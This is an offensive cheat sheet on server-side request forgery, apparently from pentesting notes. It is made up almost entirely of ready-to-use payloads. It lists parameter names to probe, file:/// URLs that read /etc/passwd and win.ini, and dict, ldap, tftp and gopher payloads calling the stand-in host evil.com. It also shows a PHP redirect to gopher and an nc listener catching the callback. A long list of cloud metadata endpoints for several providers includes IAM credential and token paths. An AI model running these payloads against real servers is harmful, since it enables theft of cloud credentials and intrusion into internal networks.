Server Side Request Forgery (SSRF)

Possible Parameters

1
"dest",
2
"redirect",
3
"uri",
4
"path",
5
"continue",
6
"url",
7
"window",
8
"next",
9
"data",
10
"reference",
11
"site",
12
"html",
13
"val",
14
"validate",
15
"domain",
16
"callback",
17
"return",
18
"page",
19
"feed",
20
"host",
21
"port",
22
"to",
23
"out",
24
"view",
25
"dir",
26
"show",
27
"navigation",
28
"open"
Copied!

What can we do with SSRF? -

  • SSRF to Reflected XSS
  • Try URL schemas to read internal and make server perform actions (file:///, dict://, ftp://, gopher://..)
  • We can scan for internal networks and ports
  • If it runs on Cloud Instances try to fetch META-DATA

SSRF to Reflected XSS

Simply fetch a file from external sites which has malicious payload with content type served as html

SSRF to LFI

File is used to fetch file from the file system
1
http://example.com/ssrf.php?url=file:///etc/passwd
2
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini
Copied!
1
http://example.com/ssrf.php?dict://evil.com:1337/
2
http://example.com/ssrf.php?url=sftp://evil.com:1337/
3
http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
4
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
5
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit
6
http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET
Copied!
1
http://example.com/ssrf.php?url=http://attacker.com/gopher.php
2
3
Payload:
4
<?php
5
header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
6
?>
Copied!
1
Attacker:
2
3
evil.com:# nc -lvp 1337
4
Listening on [0.0.0.0] (family 0, port 1337)
5
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
6
Hi
Copied!
1
Amazon AWS:
2
3
http://169.254.169.254/latest/meta-data/
4
http://169.254.169.254/latest/user-data/
5
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
6
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
7
8
Example : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
Copied!
1
Google:
2
3
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
4
http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
Copied!
1
## AWS
2
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
3
4
http://169.254.169.254/latest/user-data
5
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
6
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
7
http://169.254.169.254/latest/meta-data/ami-id
8
http://169.254.169.254/latest/meta-data/reservation-id
9
http://169.254.169.254/latest/meta-data/hostname
10
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
11
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
12
13
# AWS - Dirs
14
15
http://169.254.169.254/
16
http://169.254.169.254/latest/meta-data/
17
http://169.254.169.254/latest/meta-data/public-keys/
18
19
## Google Cloud
20
# https://cloud.google.com/compute/docs/metadata
21
# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
22
23
http://169.254.169.254/computeMetadata/v1/
24
http://metadata.google.internal/computeMetadata/v1/
25
http://metadata/computeMetadata/v1/
26
http://metadata.google.internal/computeMetadata/v1/instance/hostname
27
http://metadata.google.internal/computeMetadata/v1/instance/id
28
http://metadata.google.internal/computeMetadata/v1/project/project-id
29
30
# Google allows recursive pulls
31
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
32
33
## Google
34
# Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
35
36
http://metadata.google.internal/computeMetadata/v1beta1/
37
38
## Digital Ocean
39
# https://developers.digitalocean.com/documentation/metadata/
40
41
http://169.254.169.254/metadata/v1.json
42
http://169.254.169.254/metadata/v1/
43
http://169.254.169.254/metadata/v1/id
44
http://169.254.169.254/metadata/v1/user-data
45
http://169.254.169.254/metadata/v1/hostname
46
http://169.254.169.254/metadata/v1/region
47
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
48
49
## Packetcloud
50
51
https://metadata.packet.net/userdata
52
53
## Azure
54
# Limited, maybe more exist?
55
# https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
56
http://169.254.169.254/metadata/v1/maintenance
57
58
## Update Apr 2017, Azure has more support; requires the header "Metadata: true"
59
# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
60
http://169.254.169.254/metadata/instance?api-version=2017-04-02
61
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
62
63
## OpenStack/RackSpace
64
# (header required? unknown)
65
http://169.254.169.254/openstack
66
67
## HP Helion
68
# (header required? unknown)
69
http://169.254.169.254/2009-04-04/meta-data/
70
71
## Oracle Cloud
72
http://192.0.0.192/latest/
73
http://192.0.0.192/latest/user-data/
74
http://192.0.0.192/latest/meta-data/
75
http://192.0.0.192/latest/attributes/
76
77
## Alibaba
78
http://100.100.100.200/latest/meta-data/
79
http://100.100.100.200/latest/meta-data/instance-id
80
http://100.100.100.200/latest/meta-data/image-id
Copied!
Last modified 2yr ago